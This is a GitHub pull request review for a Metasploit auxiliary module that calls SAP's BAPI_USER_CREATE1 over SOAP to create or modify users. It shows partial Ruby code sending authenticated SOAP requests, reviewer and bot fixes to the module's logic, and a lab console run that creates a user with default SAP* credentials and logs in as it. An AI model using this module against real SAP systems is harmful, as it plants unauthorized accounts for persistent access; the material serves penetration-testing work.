This module calls the RFC BAPI_USER_CREATE1 module (via SOAP). The modul... #1029

Merged: 2 commits, Nov 18, 2012

2 participants

@nmonkee

This module calls the RFC BAPI_USER_CREATE1 module (via SOAP). The module can be used for creating/modifying users.

@brandonprry brandonprry commented on an outdated diff Nov 9, 2012
...s/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb
+ data << '</n1:BAPI_USER_CREATE1>'
+ data << '</env:Body>'
+ data << '</env:Envelope>'
+ user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
+ begin
+ print_status("[SAP] #{ip}:#{rport} - Attempting to create user '#{datastore['BAPI_USER']}' with password '#{datastore['BAPI_PASSWORD']}'")
+ res = send_request_raw({
+ 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
+ 'method' => 'POST',
+ 'data' => data,
+ 'headers' =>{
+ 'Content-Length' => data.size.to_s,
+ 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
+ 'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
+ 'Authorization' => 'Basic ' + user_pass,
+ 'Content-Type' => 'text/xml; charset=UTF-8',
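Review bot: the print_status line echoes BAPI_PASSWORD in cleartext, so the newly created credential ends up in console history and in any session log or spool file; printing only the username is enough for progress output (the value is already visible through show options). The same concern applies to the print_good line that reports success later in the module.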

trailing comma

@jvazquez-r7 jvazquez-r7 commented on an outdated diff Nov 14, 2012
...s/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb
+# experience - a very cool guy. I'd also like to thank Chris John Riley,
+# Ian de Villiers and Joris van de Vis who have Beta tested the modules and
+# provided excellent feedback. Some people just seem to enjoy hacking SAP :)
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+
+ def initialize
+ super(
+ 'Name' => 'SAP SOAP RFC BAPI_USER_CREATE1',

A little more descriptive name pls

@jvazquez-r7 jvazquez-r7 commented on an outdated diff Nov 14, 2012
...s/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb
+# Ian de Villiers and Joris van de Vis who have Beta tested the modules and
+# provided excellent feedback. Some people just seem to enjoy hacking SAP :)
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+
+ def initialize
+ super(
+ 'Name' => 'SAP SOAP RFC BAPI_USER_CREATE1',
+ 'Version' => '$Revision$',

Version field isn't needed anymore

@jvazquez-r7 jvazquez-r7 commented on an outdated diff Nov 14, 2012
...s/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+
+ def initialize
+ super(
+ 'Name' => 'SAP SOAP RFC BAPI_USER_CREATE1',
+ 'Version' => '$Revision$',
+ 'Description' => %q{
+ This module calls the RFC BAPI_USER_CREATE1 module (via SOAP).
+ The module can be used for creating/modifying users.
+ },
+ 'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]],
+ 'Author' => ['Agnivesh Sathasivam','nmonkee'],
+ 'License' => BSD_LICENSE

Can MSF_LICENSE be used?

@jvazquez-r7 jvazquez-r7 commented on an outdated diff Nov 14, 2012
...s/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb
+
+class Metasploit4 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+
+ def initialize
+ super(
+ 'Name' => 'SAP SOAP RFC BAPI_USER_CREATE1',
+ 'Version' => '$Revision$',
+ 'Description' => %q{
+ This module calls the RFC BAPI_USER_CREATE1 module (via SOAP).
+ The module can be used for creating/modifying users.
+ },
+ 'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]],

No general URLs pls, references to the technique used in the module

@jvazquez-r7

msftidy warnings should be fixed

$ tools/msftidy.rb modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb 
sap_soap_bapi_user_create1.rb:9 - [WARNING] Spaces at EOL
sap_soap_bapi_user_create1.rb:10 - [WARNING] Spaces at EOL
sap_soap_bapi_user_create1.rb:12 - [ERROR] Unicode detected: "# Mariano Nu\xC3\xB1ez (the author of the Bizploit framework) helped me in my efforts\n"
sap_soap_bapi_user_create1.rb:14 - [WARNING] Spaces at EOL
sap_soap_bapi_user_create1.rb:15 - [WARNING] Spaces at EOL
sap_soap_bapi_user_create1.rb:26 - [WARNING] Spaces at EOL
sap_soap_bapi_user_create1.rb:49 - [WARNING] Spaces at EOL
@jvazquez-r7 jvazquez-r7 commented on an outdated diff Nov 14, 2012
...s/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb
+ user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
+ begin
+ print_status("[SAP] #{ip}:#{rport} - Attempting to create user '#{datastore['BAPI_USER']}' with password '#{datastore['BAPI_PASSWORD']}'")
+ res = send_request_raw({
+ 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
+ 'method' => 'POST',
+ 'data' => data,
+ 'headers' =>{
+ 'Content-Length' => data.size.to_s,
+ 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
+ 'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
+ 'Authorization' => 'Basic ' + user_pass,
+ 'Content-Type' => 'text/xml; charset=UTF-8',
+ }
+ }, 45)
+ if res.code = 200
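Review bot: `if res.code = 200` is an assignment, not a comparison, so the condition is always true and every response (including a 401 for bad Basic credentials or a 500) falls into the "success" path; when send_request_raw returns nil on a timeout or connection failure it raises NoMethodError instead. It should read `if res and res.code == 200`, with the remaining cases handled in the else branch.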

if res and res.code = 200

@jvazquez-r7 jvazquez-r7 commented on the diff Nov 14, 2012
...s/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb
+ 'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
+ 'Authorization' => 'Basic ' + user_pass,
+ 'Content-Type' => 'text/xml; charset=UTF-8',
+ }
+ }, 45)
+ if res.code = 200
+ if res.body =~ /<h1>Logon failed<\/h1>/
+ print_error("[SAP] #{ip}:#{rport} - Logon failed")
+ elsif res.body =~ /faultstring/
+ error = []
+ error.push(res.body.scan(%r{<faultstring>(.*?)</faultstring>}))
+ print_error("[SAP] #{ip}:#{rport} - #{error.join().chomp}")
+ else
+ print_good("[SAP] #{ip}:#{rport} - User '#{datastore['BAPI_USER']}' with password '#{datastore['BAPI_PASSWORD']}' created")
+ end
+ else
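Review bot: the final else branch prints "created" whenever the body contains neither "Logon failed" nor "faultstring", but BAPI_USER_CREATE1 reports its outcome in the RETURN table (BAPIRET2 rows with TYPE S/E/W/I/A and a MESSAGE) inside an ordinary 200 SOAP response, not as a SOAP fault, so a rejected call (user already exists, password policy violation, missing authorization) is reported with print_good. Scan the RETURN rows and treat any TYPE E or A as failure, printing its MESSAGE, before claiming success. Minor: `error.push(res.body.scan(...))` nests an array inside `error`; `error = res.body.scan(%r{<faultstring>(.*?)</faultstring>}).flatten` reads more simply.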

maybe res can be nil at this point still

@jvazquez-r7 jvazquez-r7 merged commit b9a8791 into rapid7:master Nov 18, 2012

1 check passed: the Travis build passed
@jvazquez-r7

merged! Test:

msf  auxiliary(sap_soap_bapi_user_create1) > set RHOSTS 192.168.1.160
RHOSTS => 192.168.1.160
msf  auxiliary(sap_soap_bapi_user_create1) > set RPORT 8080
RPORT => 8080
msf  auxiliary(sap_soap_bapi_user_create1) > set RPORT 8000
RPORT => 8000
msf  auxiliary(sap_soap_bapi_user_create1) > set USERNAME SAP*
USERNAME => SAP*
msf  auxiliary(sap_soap_bapi_user_create1) > set PASSWORD admin1234
PASSWORD => admin1234
msf  auxiliary(sap_soap_bapi_user_create1) > set client 001
client => 001
msf  auxiliary(sap_soap_bapi_user_create1) > set BAPI_USER MSF
BAPI_USER => MSF
msf  auxiliary(sap_soap_bapi_user_create1) > set BAPI_PASSWORD msf1234
BAPI_PASSWORD => msf1234
msf  auxiliary(sap_soap_bapi_user_create1) > rexploit
[*] Reloading module...

[*] [SAP] 192.168.1.160:8000 - Attempting to create user 'MSF' with password 'msf1234'
[+] [SAP] 192.168.1.160:8000 - User 'MSF' with password 'msf1234' created
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

After that:

msf  auxiliary(sap_soap_bapi_user_create1) > use auxiliary/scanner/sap/sap_soap_rfc_ping 
msf  auxiliary(sap_soap_rfc_ping) > show options

Module options (auxiliary/scanner/sap/sap_soap_rfc_ping):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CLIENT    001              yes       Client
   PASSWORD  06071992         yes       Password 
   Proxies                    no        Use a proxy chain
   RHOSTS                     yes       The target address range or CIDR identifier
   RPORT     8000             yes       The target port
   THREADS   1                yes       The number of concurrent threads
   USERNAME  SAP*             yes       Username 
   VHOST                      no        HTTP server virtual host

msf  auxiliary(sap_soap_rfc_ping) > set RHOSTS 192.168.1.160
RHOSTS => 192.168.1.160
msf  auxiliary(sap_soap_rfc_ping) > set username MSF
username => MSF
msf  auxiliary(sap_soap_rfc_ping) > set password msf1234
password => msf1234
msf  auxiliary(sap_soap_rfc_ping) > rexploit
[*] Reloading module...

[*] [SAP] 192.168.1.160:8000 - sending SOAP RFC_PING request
[+] [SAP] 192.168.1.160:8000 - RFC service is alive
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
